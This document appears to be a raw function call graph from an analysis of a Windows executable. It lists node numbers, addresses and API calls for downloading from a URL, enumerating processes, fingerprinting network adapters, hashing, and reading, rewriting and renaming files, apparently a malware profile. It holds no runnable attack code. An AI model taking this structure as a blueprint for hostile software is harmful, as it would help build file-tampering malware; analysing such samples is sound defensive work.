42373->42014 42374->42021 42378->42040 42379->42046 42380->42048 42381->42052 42382->42053 42383->42060 42384->42064 42385->42061 42386->42081 42387->42079 42388->42070 42389->42104 42390->42107 42392 43aeb8 EncodePointer 42391->42392 42392->42392 42393 43aed2 42392->42393 42393->42111 42395 40cf32 _memset __ftell_nolock 42394->42395 42396 40cf4f InternetOpenW 42395->42396 42397 415c10 59 API calls 42396->42397 42398 40cf8a InternetOpenUrlW 42397->42398 42399 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 42398->42399 42407 40cfb2 42398->42407 42400 4156d0 59 API calls 42399->42400 42401 40d000 42400->42401 42402 4156d0 59 API calls 42401->42402 42403 40d049 42402->42403 42403->42407 42777 413010 42403->42777 42405 40d084 42406 413010 59 API calls 42405->42406 42405->42407 42406->42407 42407->42117 42409 413ab2 42408->42409 42416 413ad0 GetModuleFileNameW PathRemoveFileSpecW 42408->42416 42410 413b00 42409->42410 42411 413aba 42409->42411 42412 44f23e 59 API calls 42410->42412 42413 423b4c 59 API calls 42411->42413 42414 413ac7 42412->42414 42413->42414 42414->42416 42780 44f1bb 59 API calls 3 library calls 42414->42780 42418 418400 42416->42418 42419 418437 42418->42419 42423 418446 42418->42423 42419->42423 42781 415d50 42419->42781 42421 4184b9 42421->42142 42423->42421 42791 418d50 59 API calls 42423->42791 42425 42f7c0 __ftell_nolock 42424->42425 42426 41222d 7 API calls 42425->42426 42427 4122bd K32EnumProcesses 42426->42427 42428 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 42426->42428 42429 4122d3 42427->42429 42431 4122df 42427->42431 42428->42427 42429->42146 42430 412353 42430->42146 42431->42430 42432 4122f0 OpenProcess 42431->42432 42433 412346 CloseHandle 42432->42433 42434 41230a K32EnumProcessModules 42432->42434 42433->42430 42433->42432 42434->42433 42435 41231c K32GetModuleBaseNameW 42434->42435 42792 420235 42435->42792 42437 41233e 42437->42433 42438 412345 42437->42438 42438->42433 42440 420c62 _malloc 58 API calls 42439->42440 42443 40ef6e _memset 42440->42443 42441 40efdc 42441->42151 42442 420c62 _malloc 58 API calls 42442->42443 42443->42441 42443->42442 42443->42443 42445 413f05 42444->42445 42451 413eae 42444->42451 42446 413fb1 42445->42446 42447 413f18 42445->42447 42448 44f23e 59 API calls 42446->42448 42449 413fbb 42447->42449 42450 413f2d 42447->42450 42457 413f3d ___crtGetEnvironmentStringsW 42447->42457 42448->42449 42452 44f23e 59 API calls 42449->42452 42453 416760 59 API calls 42450->42453 42450->42457 42451->42445 42455 413ed4 42451->42455 42454 413fc5 42452->42454 42453->42457 42456 413ff0 59 API calls 42454->42456 42458 413ed9 42455->42458 42459 413eef 42455->42459 42460 413fdf 42456->42460 42457->42151 42804 413da0 59 API calls ___crtGetEnvironmentStringsW 42458->42804 42805 413da0 59 API calls ___crtGetEnvironmentStringsW 42459->42805 42460->42151 42463 413ee9 42463->42151 42464 413eff 42464->42151 42466 40d27d CoInitializeSecurity 42465->42466 42472 40d276 42465->42472 42467 414690 59 API calls 42466->42467 42468 40d2b8 CoCreateInstance 42467->42468 42469 40d2e3 VariantInit VariantInit VariantInit VariantInit 42468->42469 42470 40da3c CoUninitialize 42468->42470 42471 40d38e VariantClear VariantClear VariantClear VariantClear 42469->42471 42470->42472 42473 40d3e2 42471->42473 42474 40d3cc CoUninitialize 42471->42474 42472->42192 42806 40b140 42473->42806 42474->42472 42477 40d3f6 42811 40b1d0 42477->42811 42479 40d422 42480 40d426 CoUninitialize 42479->42480 42481 40d43c 42479->42481 42480->42472 42482 40b140 60 API calls 42481->42482 42484 40d449 42482->42484 42485 40b1d0 SysFreeString 42484->42485 42486 40d471 42485->42486 42487 40d496 CoUninitialize 42486->42487 42488 40d4ac 42486->42488 42487->42472 42490 40b140 60 API calls 42488->42490 42545 40d8cf 42488->42545 42491 40d4d5 42490->42491 42492 40b1d0 SysFreeString 42491->42492 42493 40d4fd 42492->42493 42494 40b140 60 API calls 42493->42494 42493->42545 42495 40d5ae 42494->42495 42496 40b1d0 SysFreeString 42495->42496 42497 40d5d6 42496->42497 42498 40b140 60 API calls 42497->42498 42497->42545 42499 40d679 42498->42499 42500 40b1d0 SysFreeString 42499->42500 42501 40d6a1 42500->42501 42502 40b140 60 API calls 42501->42502 42501->42545 42503 40d6b6 42502->42503 42504 40b1d0 SysFreeString 42503->42504 42505 40d6de 42504->42505 42506 40b140 60 API calls 42505->42506 42505->42545 42507 40d707 42506->42507 42508 40b1d0 SysFreeString 42507->42508 42509 40d72f 42508->42509 42510 40b140 60 API calls 42509->42510 42509->42545 42511 40d744 42510->42511 42512 40b1d0 SysFreeString 42511->42512 42513 40d76c 42512->42513 42513->42545 42815 423aaf GetSystemTimeAsFileTime 42513->42815 42515 40d77d 42817 423551 42515->42817 42520 412c40 59 API calls 42521 40d7b5 42520->42521 42522 412900 60 API calls 42521->42522 42523 40d7c3 42522->42523 42524 40b140 60 API calls 42523->42524 42525 40d7db 42524->42525 42526 40b1d0 SysFreeString 42525->42526 42527 40d7ff 42526->42527 42528 40b140 60 API calls 42527->42528 42527->42545 42529 40d8a3 42528->42529 42530 40b1d0 SysFreeString 42529->42530 42531 40d8cb 42530->42531 42532 40b140 60 API calls 42531->42532 42531->42545 42533 40d8ea 42532->42533 42534 40b1d0 SysFreeString 42533->42534 42535 40d912 42534->42535 42535->42545 42825 40b400 SysAllocString 42535->42825 42537 40d936 VariantInit VariantInit 42538 40b140 60 API calls 42537->42538 42539 40d985 42538->42539 42540 40b1d0 SysFreeString 42539->42540 42541 40d9e7 VariantClear VariantClear VariantClear 42540->42541 42542 40da10 42541->42542 42543 40da46 CoUninitialize 42541->42543 42829 42052a 78 API calls __snprintf_l 42542->42829 42543->42472 42545->42470 42980 40e670 42547->42980 42549 40e79e 42550 413ea0 59 API calls 42549->42550 42551 40e7c3 42550->42551 42552 413ff0 59 API calls 42551->42552 42553 40e7ff 42552->42553 43006 40e870 42553->43006 42555 40e806 42556 413ff0 59 API calls 42555->42556 42557 40e80d 42555->42557 42556->42557 42557->42209 43258 413c40 42558->43258 42560 41288c WideCharToMultiByte 43268 4184e0 42560->43268 42562 4128cf 42562->42215 42564 41102b CryptCreateHash 42563->42564 42565 41101a 42563->42565 42567 411045 42564->42567 42568 411056 lstrlenA CryptHashData 42564->42568 43277 430eca RaiseException 42565->43277 43278 430eca RaiseException 42567->43278 42570 41107f CryptGetHashParam 42568->42570 42571 41106e 42568->42571 42573 41109f 42570->42573 42575 4110b0 _memset 42570->42575 43279 430eca RaiseException 42571->43279 43280 430eca RaiseException 42573->43280 42576 4110cf CryptGetHashParam 42575->42576 42577 4110f5 42576->42577 42578 4110e4 42576->42578 42580 420c62 _malloc 58 API calls 42577->42580 43281 430eca RaiseException 42578->43281 42582 411105 _memset 42580->42582 42581 411148 42584 41114e CryptDestroyHash CryptReleaseContext 42581->42584 42582->42581 42583 4204a6 _sprintf 83 API calls 42582->42583 42585 411133 lstrcatA 42583->42585 42584->42217 42585->42581 42585->42582 42587 413a90 59 API calls 42586->42587 42588 41294c MultiByteToWideChar 42587->42588 42589 418400 59 API calls 42588->42589 42590 41298d 42589->42590 42590->42236 42592 413591 42591->42592 42593 4135d6 42591->42593 42592->42593 42595 413597 42592->42595 42594 414f70 59 API calls 42593->42594 42597 4135b7 42593->42597 42594->42597 42595->42597 43282 414f70 42595->43282 42597->42255 42599 412dec 42598->42599 42602 412dfa 42598->42602 42600 413ea0 59 API calls 42599->42600 42601 412df5 42600->42601 42601->42311 42603 413ea0 59 API calls 42602->42603 42604 412e11 42603->42604 42604->42311 42606 412c5f 42605->42606 42609 412c71 42605->42609 42607 4156d0 59 API calls 42606->42607 42608 412c6a 42607->42608 42608->42316 42610 4156d0 59 API calls 42609->42610 42611 412c8a 42610->42611 42611->42316 42613 413ff0 59 API calls 42612->42613 42614 412c13 42613->42614 42615 40ecb0 42614->42615 42616 40ece5 42615->42616 42618 40eefc 42616->42618 43304 421b3b 59 API calls 3 library calls 42616->43304 42618->42341 42619 4156d0 59 API calls 42622 40ed6b _memmove 42619->42622 42620 415230 59 API calls 42620->42622 42622->42618 42622->42619 42622->42620 43305 421b3b 59 API calls 3 library calls 42622->43305 42624 413742 42623->42624 42625 4136e7 42623->42625 42627 41370d 42624->42627 42628 414f70 59 API calls 42624->42628 42625->42624 42626 4136ed 42625->42626 42626->42627 42630 414f70 59 API calls 42626->42630 42629 41377f 42627->42629 42631 414690 59 API calls 42627->42631 42628->42627 42632 40ca70 42629->42632 42630->42627 42631->42629 42633 40cb64 42632->42633 42637 40caa3 42632->42637 42633->42324 42634 40cb6b 43306 44f26c 59 API calls 3 library calls 42634->43306 42636 40cb75 42636->42324 42637->42633 42637->42634 42638 4136c0 59 API calls 42637->42638 42638->42637 42640 414690 59 API calls 42639->42640 42641 4130d4 42640->42641 42642 40c740 42641->42642 43307 420fdd 42642->43307 42645 40c944 CreateDirectoryW 42647 420fdd 115 API calls 42645->42647 42650 40c960 42647->42650 42648 40c90e 42648->42645 42654 40c96a 42648->42654 42649 40c906 43330 423a38 83 API calls 5 library calls 42649->43330 42650->42654 42662 40c9d5 42650->42662 43331 4228fd 82 API calls 5 library calls 42650->43331 42654->42330 42655 40c9ed 43333 4228fd 82 API calls 5 library calls 42655->43333 42656 420546 58 API calls 42665 40c79e _memmove 42656->42665 42658 40c9f8 43334 423a38 83 API calls 5 library calls 42658->43334 42660 415c10 59 API calls 42660->42665 43332 4228fd 82 API calls 5 library calls 42662->43332 42663 414f70 59 API calls 42663->42665 42664 40c9fe 42664->42654 42665->42649 42665->42656 42665->42660 42665->42663 43317 421101 42665->43317 42667 411223 GetFileSizeEx 42666->42667 42683 411287 42666->42683 42668 4112a3 VirtualAlloc 42667->42668 42669 411234 42667->42669 42670 41131a CloseHandle 42668->42670 42674 4112c0 _memset 42668->42674 42669->42668 42671 41123c CloseHandle 42669->42671 42670->42333 42672 413100 59 API calls 42671->42672 42673 411253 42672->42673 43729 4159d0 42673->43729 42676 4112e9 SetFilePointerEx 42674->42676 42708 4113a7 42674->42708 42679 411332 ReadFile 42676->42679 42680 41130c VirtualFree 42676->42680 42677 4113b7 SetFilePointer 42681 4113f5 ReadFile 42677->42681 42747 4115ae 42677->42747 42678 41126a MoveFileW 42678->42683 42679->42680 42684 41134f 42679->42684 42680->42670 42685 411440 42681->42685 42686 41140f VirtualFree CloseHandle 42681->42686 42682 4115c5 SetFilePointerEx 42682->42686 42687 4115df 42682->42687 42683->42333 42684->42680 42688 411356 42684->42688 42691 411471 lstrlenA 42685->42691 42692 411718 lstrlenA 42685->42692 42685->42747 42689 41142f 42686->42689 42690 4115ed WriteFile 42687->42690 42694 411602 42687->42694 42688->42677 42693 412c40 59 API calls 42688->42693 42689->42333 42690->42686 42690->42694 43755 420be4 42691->43755 43807 420be4 42692->43807 42698 411364 42693->42698 42696 4130b0 59 API calls 42694->42696 42700 411631 42696->42700 42698->42708 42709 411379 VirtualFree CloseHandle 42698->42709 42703 412840 60 API calls 42700->42703 42706 41163c WriteFile 42703->42706 42715 411658 42706->42715 42708->42677 42713 411396 42709->42713 42713->42333 42715->42686 42716 411660 lstrlenA WriteFile 42715->42716 42716->42686 42717 411686 CloseHandle 42716->42717 42719 413100 59 API calls 42717->42719 42721 4116a3 42719->42721 42722 4159d0 59 API calls 42721->42722 42724 4116be MoveFileW 42722->42724 42726 4116e4 VirtualFree 42724->42726 42729 4118a7 42724->42729 42730 4116fc 42726->42730 42733 4118e3 42729->42733 42734 4118d5 VirtualFree 42729->42734 42730->42333 42733->42683 42736 4118e8 CloseHandle 42733->42736 42734->42733 42736->42683 42747->42682 42751->42336 42753 41bab9 42752->42753 42754 41babb ShowWindow UpdateWindow 42752->42754 42753->42338 42754->42338 42762 410a81 42755->42762 42756 410bb4 42756->42342 42757 4156d0 59 API calls 42757->42762 42758 413ea0 59 API calls 42759 410ae0 SetErrorMode PathFileExistsA SetErrorMode 42758->42759 42760 410b0c GetDriveTypeA 42759->42760 42759->42762 42760->42762 42761 413ff0 59 API calls 42761->42762 42762->42756 42762->42757 42762->42758 42762->42761 42763 412900 60 API calls 42762->42763 42764 413580 59 API calls 42762->42764 42763->42762 42764->42762 42765->42368 43915 41f130 timeGetTime 42765->43915 42766->42348 44119 41fd80 42766->44119 42767->42124 42768->42159 42770 411ad0 42769->42770 42771 411af4 42769->42771 42772 411afc 42770->42772 42773 411adc DispatchMessageW PeekMessageW 42770->42773 42771->42168 42772->42168 42773->42770 42773->42771 42774->42169 42775->42309 42776->42341 42778 413ff0 59 API calls 42777->42778 42779 41303e 42778->42779 42779->42405 42782 415d66 42781->42782 42783 415dfe 42781->42783 42785 416950 59 API calls 42782->42785 42790 415d84 ___crtGetEnvironmentStringsW 42782->42790 42784 44f23e 59 API calls 42783->42784 42786 415e08 42784->42786 42787 415d76 42785->42787 42788 44f23e 59 API calls 42786->42788 42787->42423 42789 415e1a 42788->42789 42789->42423 42790->42423 42791->42423 42793 420241 42792->42793 42794 4202b6 42792->42794 42796 425208 __fptostr 58 API calls 42793->42796 42798 420266 42793->42798 42803 4202c8 60 API calls 3 library calls 42794->42803 42799 42024d 42796->42799 42797 4202c3 42797->42437 42798->42437 42802 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42799->42802 42801 420258 42801->42437 42802->42801 42803->42797 42804->42463 42805->42464 42807 423b4c 59 API calls 42806->42807 42808 40b164 42807->42808 42809 40b177 SysAllocString 42808->42809 42810 40b194 42808->42810 42809->42810 42810->42477 42812 40b202 42811->42812 42813 40b1de 42811->42813 42812->42479 42813->42812 42814 40b1f5 SysFreeString 42813->42814 42814->42812 42816 423add __aulldiv 42815->42816 42816->42515 42830 43035d 42817->42830 42819 42355a 42820 40d78f 42819->42820 42838 423576 42819->42838 42822 4228e0 42820->42822 42933 42279f 42822->42933 42826 40b423 42825->42826 42827 40b41d 42825->42827 42828 40b42d VariantClear 42826->42828 42827->42537 42828->42537 42829->42545 42831 42501f __getptd_noexit 58 API calls 42830->42831 42832 430363 42831->42832 42833 43038d 42832->42833 42835 428cde __malloc_crt 58 API calls 42832->42835 42837 430369 42832->42837 42833->42819 42834 425208 __fptostr 58 API calls 42836 43036e 42834->42836 42835->42837 42836->42819 42837->42833 42837->42834 42839 423591 42838->42839 42840 4235a9 _memset 42838->42840 42841 425208 __fptostr 58 API calls 42839->42841 42840->42839 42847 4235c0 42840->42847 42842 423596 42841->42842 42879 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42842->42879 42844 4235cb 42846 425208 __fptostr 58 API calls 42844->42846 42845 4235e9 42871 42fb64 42845->42871 42870 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 42846->42870 42847->42844 42847->42845 42849 4235ee 42880 42f803 58 API calls __fptostr 42849->42880 42851 4235f7 42852 4237e5 42851->42852 42881 42f82d 58 API calls __fptostr 42851->42881 42894 4242fd 8 API calls 2 library calls 42852->42894 42855 423609 42855->42852 42882 42f857 42855->42882 42856 4237ef 42858 42361b 42858->42852 42859 423624 42858->42859 42860 42369b 42859->42860 42862 423637 42859->42862 42892 42f939 58 API calls 4 library calls 42860->42892 42889 42f939 58 API calls 4 library calls 42862->42889 42863 4236a2 42863->42870 42893 42fbb4 58 API calls 4 library calls 42863->42893 42865 42364f 42865->42870 42890 42fbb4 58 API calls 4 library calls 42865->42890 42868 423668 42868->42870 42891 42f939 58 API calls 4 library calls 42868->42891 42870->42820 42872 42fb70 _doexit 42871->42872 42873 42fba5 _doexit 42872->42873 42874 428af7 __lock 58 API calls 42872->42874 42873->42849 42875 42fb80 42874->42875 42876 42fb93 42875->42876 42895 42fe47 42875->42895 42924 42fbab LeaveCriticalSection _doexit 42876->42924 42879->42870 42880->42851 42881->42855 42883 42f861 42882->42883 42884 42f876 42882->42884 42885 425208 __fptostr 58 API calls 42883->42885 42884->42858 42886 42f866 42885->42886 42932 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42886->42932 42888 42f871 42888->42858 42889->42865 42890->42868 42891->42870 42892->42863 42893->42870 42894->42856 42896 42fe53 _doexit 42895->42896 42897 428af7 __lock 58 API calls 42896->42897 42898 42fe71 _W_expandtime 42897->42898 42899 42f857 __tzset_nolock 58 API calls 42898->42899 42900 42fe86 42899->42900 42922 42ff25 __tzset_nolock __isindst_nolock 42900->42922 42925 42f803 58 API calls __fptostr 42900->42925 42903 42fe98 42903->42922 42926 42f82d 58 API calls __fptostr 42903->42926 42904 42ff71 GetTimeZoneInformation 42904->42922 42905 420bed _free 58 API calls 42905->42922 42907 42feaa 42907->42922 42927 433f99 58 API calls 2 library calls 42907->42927 42908 42ffd8 WideCharToMultiByte 42908->42922 42910 42feb8 42928 441667 78 API calls 3 library calls 42910->42928 42912 430010 WideCharToMultiByte 42912->42922 42914 42ff0c _strlen 42916 428cde __malloc_crt 58 API calls 42914->42916 42915 43ff8e 58 API calls ___getlocaleinfo 42915->42922 42919 42ff1a _strlen 42916->42919 42917 42fed9 ___TypeMatch 42917->42914 42918 420bed _free 58 API calls 42917->42918 42917->42922 42918->42914 42919->42922 42929 42c0fd 58 API calls __fptostr 42919->42929 42921 430157 __tzset_nolock _doexit __isindst_nolock 42921->42876 42922->42904 42922->42905 42922->42908 42922->42912 42922->42915 42922->42921 42923 423c2d 61 API calls UnDecorator::getTemplateConstant 42922->42923 42930 4242fd 8 API calls 2 library calls 42922->42930 42931 4300d7 LeaveCriticalSection _doexit 42922->42931 42923->42922 42924->42873 42925->42903 42926->42907 42927->42910 42928->42917 42929->42922 42930->42922 42931->42922 42932->42888 42960 42019c 42933->42960 42936 4227d4 42937 425208 __fptostr 58 API calls 42936->42937 42938 4227d9 42937->42938 42968 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42938->42968 42939 4227e9 MultiByteToWideChar 42942 422804 GetLastError 42939->42942 42943 422815 42939->42943 42941 40d7a3 42941->42520 42969 4251e7 58 API calls 3 library calls 42942->42969 42945 428cde __malloc_crt 58 API calls 42943->42945 42946 42281d 42945->42946 42947 422825 MultiByteToWideChar 42946->42947 42959 422810 42946->42959 42947->42942 42949 42283f 42947->42949 42948 420bed _free 58 API calls 42951 4228a0 42948->42951 42950 428cde __malloc_crt 58 API calls 42949->42950 42952 42284a 42950->42952 42953 420bed _free 58 API calls 42951->42953 42952->42959 42970 42d51e 88 API calls 3 library calls 42952->42970 42953->42941 42955 422866 42956 42286f WideCharToMultiByte 42955->42956 42955->42959 42957 42288b GetLastError 42956->42957 42956->42959 42971 4251e7 58 API calls 3 library calls 42957->42971 42959->42948 42961 4201ad 42960->42961 42964 4201fa 42960->42964 42972 425007 42961->42972 42963 4201b3 42966 4201da 42963->42966 42977 4245dc 58 API calls 6 library calls 42963->42977 42964->42936 42964->42939 42966->42964 42978 42495e 58 API calls 6 library calls 42966->42978 42968->42941 42969->42959 42970->42955 42971->42959 42973 42501f __getptd_noexit 58 API calls 42972->42973 42974 42500d 42973->42974 42975 42501a 42974->42975 42979 427c2e 58 API calls 3 library calls 42974->42979 42975->42963 42977->42966 42978->42964 42981 420c62 _malloc 58 API calls 42980->42981 42982 40e684 42981->42982 42983 420c62 _malloc 58 API calls 42982->42983 42984 40e690 42983->42984 42985 40e6b4 GetAdaptersInfo 42984->42985 42986 40e699 42984->42986 42988 40e6c4 42985->42988 42989 40e6db GetAdaptersInfo 42985->42989 42987 421f2d _wprintf 85 API calls 42986->42987 42990 40e6a3 42987->42990 42991 420bed _free 58 API calls 42988->42991 42992 40e741 42989->42992 42993 40e6ea 42989->42993 42994 420bed _free 58 API calls 42990->42994 42996 40e6ca 42991->42996 42995 420bed _free 58 API calls 42992->42995 43030 4204a6 42993->43030 42999 40e6a9 42994->42999 43000 40e74a 42995->43000 43001 420c62 _malloc 58 API calls 42996->43001 42999->42549 43000->42549 43003 40e6d2 43001->43003 43003->42986 43003->42989 43004 40e737 43005 421f2d _wprintf 85 API calls 43004->43005 43005->42992 43007 4156d0 59 API calls 43006->43007 43008 40e8bb CryptAcquireContextW 43007->43008 43009 40e8d8 43008->43009 43010 40e8e9 CryptCreateHash 43008->43010 43253 430eca RaiseException 43009->43253 43012 40e903 43010->43012 43013 40e914 CryptHashData 43010->43013 43254 430eca RaiseException 43012->43254 43015 40e932 43013->43015 43016 40e943 CryptGetHashParam 43013->43016 43255 430eca RaiseException 43015->43255 43018 40e963 43016->43018 43020 40e974 _memset 43016->43020 43256 430eca RaiseException 43018->43256 43021 40e993 CryptGetHashParam 43020->43021 43022 40e9a8 43021->43022 43027 40e9b9 43021->43027 43257 430eca RaiseException 43022->43257 43024 40ea10 43026 40ea16 CryptDestroyHash CryptReleaseContext 43024->43026 43025 4204a6 _sprintf 83 API calls 43025->43027 43028 40ea33 43026->43028 43027->43024 43027->43025 43029 413ea0 59 API calls 43027->43029 43028->42555 43029->43027 43031 4204c2 43030->43031 43032 4204d7 43030->43032 43033 425208 __fptostr 58 API calls 43031->43033 43032->43031 43034 4204de 43032->43034 43035 4204c7 43033->43035 43059 426ab6 43034->43059 43058 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43035->43058 43038 420504 43039 40e725 43038->43039 43083 4264ef 78 API calls 7 library calls 43038->43083 43041 421f2d 43039->43041 43042 421f39 _doexit 43041->43042 43043 421f4a 43042->43043 43044 421f5f __flsbuf 43042->43044 43045 425208 __fptostr 58 API calls 43043->43045 43102 420e92 43044->43102 43046 421f4f 43045->43046 43118 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43046->43118 43049 421f6f __flsbuf 43107 42afd2 43049->43107 43050 421f5a _doexit 43050->43004 43052 421f82 __flsbuf 43053 426ab6 __output_l 83 API calls 43052->43053 43054 421f9b __flsbuf 43053->43054 43114 42afa1 43054->43114 43058->43039 43060 42019c _LocaleUpdate::_LocaleUpdate 58 API calls 43059->43060 43061 426b2b 43060->43061 43062 425208 __fptostr 58 API calls 43061->43062 43063 426b30 43062->43063 43064 427601 43063->43064 43078 426b50 __woutput_p_l __aulldvrm _strlen 43063->43078 43091 42816b 43063->43091 43065 425208 __fptostr 58 API calls 43064->43065 43066 427606 43065->43066 43099 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43066->43099 43068 4275db 43084 42a77e 43068->43084 43071 4275fd 43071->43038 43073 42766a 78 API calls _write_string 43073->43078 43074 4271b9 DecodePointer 43074->43078 43075 420bed _free 58 API calls 43075->43078 43076 43adf7 60 API calls __cftof 43076->43078 43077 428cde __malloc_crt 58 API calls 43077->43078 43078->43064 43078->43068 43078->43073 43078->43074 43078->43075 43078->43076 43078->43077 43079 42721c DecodePointer 43078->43079 43080 4276b2 78 API calls _write_multi_char 43078->43080 43081 427241 DecodePointer 43078->43081 43082 4276de 78 API calls _write_string 43078->43082 43098 422bcc 58 API calls _LocaleUpdate::_LocaleUpdate 43078->43098 43079->43078 43080->43078 43081->43078 43082->43078 43083->43039 43085 42a786 43084->43085 43086 42a788 IsProcessorFeaturePresent 43084->43086 43085->43071 43088 42ab9c 43086->43088 43100 42ab4b 5 API calls ___raise_securityfailure 43088->43100 43090 42ac7f 43090->43071 43092 428175 43091->43092 43093 42818a 43091->43093 43094 425208 __fptostr 58 API calls 43092->43094 43093->43078 43095 42817a 43094->43095 43101 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43095->43101 43097 428185 43097->43078 43098->43078 43099->43068 43100->43090 43101->43097 43103 420eb3 EnterCriticalSection 43102->43103 43104 420e9d 43102->43104 43103->43049 43105 428af7 __lock 58 API calls 43104->43105 43106 420ea6 43105->43106 43106->43049 43108 42816b __fseek_nolock 58 API calls 43107->43108 43109 42afdf 43108->43109 43120 4389c2 43109->43120 43111 42afe5 __flsbuf 43112 42b034 43111->43112 43113 428cde __malloc_crt 58 API calls 43111->43113 43112->43052 43113->43112 43115 421faf 43114->43115 43116 42afaa 43114->43116 43119 421fc9 LeaveCriticalSection LeaveCriticalSection __flsbuf __getstream 43115->43119 43116->43115 43130 42836b 43116->43130 43118->43050 43119->43050 43121 4389da 43120->43121 43122 4389cd 43120->43122 43124 425208 __fptostr 58 API calls 43121->43124 43125 4389e6 43121->43125 43123 425208 __fptostr 58 API calls 43122->43123 43127 4389d2 43123->43127 43126 438a07 43124->43126 43125->43111 43129 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43126->43129 43127->43111 43129->43127 43131 4283a2 43130->43131 43132 42837e 43130->43132 43131->43115 43132->43131 43133 42816b __fseek_nolock 58 API calls 43132->43133 43134 42839b 43133->43134 43136 42df14 43134->43136 43137 42df20 _doexit 43136->43137 43138 42df44 43137->43138 43139 42df2d 43137->43139 43141 42dfe3 43138->43141 43143 42df58 43138->43143 43236 4251d4 58 API calls __getptd_noexit 43139->43236 43240 4251d4 58 API calls __getptd_noexit 43141->43240 43142 42df32 43145 425208 __fptostr 58 API calls 43142->43145 43146 42df80 43143->43146 43147 42df76 43143->43147 43156 42df39 _doexit 43145->43156 43164 43b134 43146->43164 43237 4251d4 58 API calls __getptd_noexit 43147->43237 43148 42df7b 43152 425208 __fptostr 58 API calls 43148->43152 43151 42df86 43153 42df99 43151->43153 43154 42dfac 43151->43154 43155 42dfef 43152->43155 43173 42e003 43153->43173 43157 425208 __fptostr 58 API calls 43154->43157 43241 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43155->43241 43156->43131 43161 42dfb1 43157->43161 43160 42dfa5 43239 42dfdb LeaveCriticalSection __unlock_fhandle 43160->43239 43238 4251d4 58 API calls __getptd_noexit 43161->43238 43165 43b140 _doexit 43164->43165 43166 43b18f EnterCriticalSection 43165->43166 43167 428af7 __lock 58 API calls 43165->43167 43168 43b1b5 _doexit 43166->43168 43169 43b165 43167->43169 43168->43151 43172 43b17d 43169->43172 43242 43263e InitializeCriticalSectionAndSpinCount 43169->43242 43243 43b1b9 LeaveCriticalSection _doexit 43172->43243 43174 42e010 __ftell_nolock 43173->43174 43175 42e06e 43174->43175 43176 42e04f 43174->43176 43206 42e044 43174->43206 43180 42e0c6 43175->43180 43181 42e0aa 43175->43181 43244 4251d4 58 API calls __getptd_noexit 43176->43244 43178 42a77e CatchGuardHandler 6 API calls 43182 42e864 43178->43182 43179 42e054 43183 425208 __fptostr 58 API calls 43179->43183 43184 42e0df 43180->43184 43248 42f744 60 API calls 3 library calls 43180->43248 43246 4251d4 58 API calls __getptd_noexit 43181->43246 43182->43160 43186 42e05b 43183->43186 43188 4389c2 __read_nolock 58 API calls 43184->43188 43245 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43186->43245 43191 42e0ed 43188->43191 43189 42e0af 43192 425208 __fptostr 58 API calls 43189->43192 43193 42e446 43191->43193 43198 425007 _GetLcidFromLanguage 58 API calls 43191->43198 43194 42e0b6 43192->43194 43195 42e464 43193->43195 43196 42e7d9 WriteFile 43193->43196 43247 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43194->43247 43199 42e588 43195->43199 43204 42e47a 43195->43204 43200 42e439 GetLastError 43196->43200 43226 42e678 43196->43226 43201 42e119 GetConsoleMode 43198->43201 43210 42e593 43199->43210 43213 42e67d 43199->43213 43208 42e406 43200->43208 43201->43193 43203 42e158 43201->43203 43202 42e812 43202->43206 43207 425208 __fptostr 58 API calls 43202->43207 43203->43193 43209 42e168 GetConsoleCP 43203->43209 43204->43202 43205 42e4e9 WriteFile 43204->43205 43204->43208 43205->43200 43205->43204 43206->43178 43211 42e840 43207->43211 43208->43202 43208->43206 43212 42e566 43208->43212 43209->43202 43232 42e197 43209->43232 43210->43202 43215 42e5f8 WriteFile 43210->43215 43252 4251d4 58 API calls __getptd_noexit 43211->43252 43217 42e571 43212->43217 43218 42e809 43212->43218 43213->43202 43214 42e6f2 WideCharToMultiByte 43213->43214 43214->43200 43228 42e739 43214->43228 43215->43200 43219 42e647 43215->43219 43220 425208 __fptostr 58 API calls 43217->43220 43251 4251e7 58 API calls 3 library calls 43218->43251 43219->43208 43219->43210 43219->43226 43223 42e576 43220->43223 43222 42e741 WriteFile 43225 42e794 GetLastError 43222->43225 43222->43228 43250 4251d4 58 API calls __getptd_noexit 43223->43250 43225->43228 43226->43208 43228->43208 43228->43213 43228->43222 43228->43226 43229 42e280 WideCharToMultiByte 43229->43208 43231 42e2bb WriteFile 43229->43231 43230 43c76c 60 API calls __write_nolock 43230->43232 43231->43200 43234 42e2ed 43231->43234 43232->43208 43232->43229 43232->43230 43232->43234 43249 422d33 58 API calls __isleadbyte_l 43232->43249 43233 44058c WriteConsoleW CreateFileW __putwch_nolock 43233->43234 43234->43200 43234->43208 43234->43232 43234->43233 43235 42e315 WriteFile 43234->43235 43235->43200 43235->43234 43236->43142 43237->43148 43238->43160 43239->43156 43240->43148 43241->43156 43242->43172 43243->43166 43244->43179 43245->43206 43246->43189 43247->43206 43248->43184 43249->43232 43250->43206 43251->43206 43252->43206 43253->43010 43254->43013 43255->43016 43256->43020 43257->43027 43259 413c62 43258->43259 43265 413c74 _memset 43258->43265 43260 413c67 43259->43260 43261 413c96 43259->43261 43262 423b4c 59 API calls 43260->43262 43263 44f23e 59 API calls 43261->43263 43264 413c6d 43262->43264 43263->43264 43264->43265 43275 44f1bb 59 API calls 3 library calls 43264->43275 43265->42560 43269 418513 43268->43269 43273 418520 43268->43273 43269->43273 43276 415810 59 API calls ___crtGetEnvironmentStringsW 43269->43276 43270 418619 43270->42562 43272 44f23e 59 API calls 43272->43273 43273->43270 43273->43272 43274 416760 59 API calls 43273->43274 43274->43273 43276->43273 43277->42564 43278->42568 43279->42570 43280->42575 43281->42577 43283 414ff2 43282->43283 43284 414f92 43282->43284 43283->42597 43285 414fb4 43284->43285 43286 414ff7 43284->43286 43287 414fd3 43285->43287 43288 414fe5 43285->43288 43289 44f23e 59 API 